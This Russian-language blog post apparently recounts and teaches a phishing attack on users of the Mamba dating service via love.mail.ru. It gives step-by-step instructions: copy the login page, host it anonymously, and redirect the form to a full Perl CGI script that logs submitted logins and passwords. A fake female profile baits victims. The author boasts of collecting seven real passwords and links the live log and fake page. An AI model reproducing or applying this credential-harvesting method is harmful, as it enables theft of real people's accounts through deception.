Вчера-позавчера Исаев решил немного заняться хакингом, а именно той его отраслью, которая называется "социальная инженерия".

Объясню на примере(Хакер и Ламер).

Х: Ну дай пароль, я покажу, как сделать так и так!
Л: Не дам, а вдруг ты хакер?
Х: Я не хакер
Л: На пароль.

Утрирую, конечно, но смысл технологии - натуральный развод. Итак, объясняю уже готовую технологию на примере службы знакомств Mamba. К слову скажу, что эта служба широко представлена на таких порталах как mail.ru, rambler.ru.

К делу, господа.


1. Для начала забегаем на страницу входа юзеров и тупо сохраняем страницу авторизации пользователя. (Ваше имя, ваш пароль) Ок.

2. Регистрируемся на бесплатном анонимном хостинге. Я выбрал замечательный www.fatal.ru. Можно любой другой, хоть www.agava.ru

3. Делаем на рнр либо perl скрипт, который бы принимал ввод всех пользовательских данных. Вот вам пример на perl:

PHP:


#!/usr/bin/perl -w

#путь к лог-файлу

$LogFile="log.txt";

#максимальное число записей в лог-файле

$mlength=500;

#делаем редирект на картинку

print "Location: image.gif\n\n";

#читаем CGI запрос



$input = $ENV{'QUERY_STRING'} if $ENV{'QUERY_STRING'};

$input =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

#получаем время запроса и HTTP_REFERER

$now_string = localtime;

$ref = $ENV{'HTTP_REFERER'};

#читаем лог-файл в массив

open (LOG,"$LogFile") || die "Can't Open $LogFile: $!\n";

@LOGtext=<log>;

close (LOG);

#открываем на запись лог

open (LOG, ">$LogFile");

#сохраняем данные запроса

print LOG "[$now_string] IP=$ENV{'REMOTE_ADDR'} REFERER=$ref QUERY=$input\n";

#сохраняем остальные логи, так что бы длина лог-файла не превышала mlength

$counter=1;

foreach $LOGitem (@LOGtext)

{if ($counter<$mlength){ print LOG "$LOGitem"; };

$counter++;};

#закрываем лог

close (LOG);

exit;
font>

Сохраняем. У меня скрипт назван s.cgi. Картинка s.gif - она будет показана пользователю. Так, для дурости людской.

4. Забрасываем страницу авторизации и скрипт на этот самый хостинг, исправляя в html параметр ACTION у формы на наш великий скрипт. (Скрипты такого вида называеются снифферы). Например у меня s.cgi

5. Проверяем всё хозяйство.

6. Регаемся на www.love.mail.ru. Исаев зарегался на красивую девушку(тьфу! :-)) по имени Ника. Нарыл фотку посимпатичнее. Вот она, красавица http://love.mail.ru/nika_gold . Обратите внимание на рубрику "дневник" - вот наш Клондайк.

7. Вставляем ссылочку, которая привлечет внимание мужской аудитории. Мне лично нравятся кошки(Котька, привет!), поэтому я ставлю ссылку "Просто кошкО", ведущую на поддельную страницу авторизации. Данные которой мой скрипт успеЩно сохраняет в текстовом файле log.txt.

8. Все готово, всё работает. Начинаем знакомиться...

Ламер заходит на страницу, видит красивую девушку, у него начинают течь слюни и кровь приливает от мозга к члену. Простите за грубость, но это так.

В надежде узнать как можно больше о таинственной Нике он шарится по всяким Автопортретам, Фотогалереям и наконец попадает в дневник. Тут работает мужская логика - ага, на знакомствах нельзя сильно эротичных фото, значит она на ссылке... Тыкает. И тут - ой, досада, похоже, обрывается связь с сервером. НУ ничего, введем пароль и пойдем дальше. А вот как раз дальше вступают в работу s.cgi и log.txt...


Канэц:

Чтобы не быть голословным, приведу ссылку на файл лога. Последние значения в каждой строке - это как раз login & password. За 2 дня 7 паролей, учитывая то, что я активно не сидел этой Никой и никому почти не отписывался. А можно было бы... Ой...

http://shpion.fatal.ru/log.txt - лог файл.
http://shpion.fatal.ru/ - поддельная страница авторизации. Даже адрес вверху не закрывал...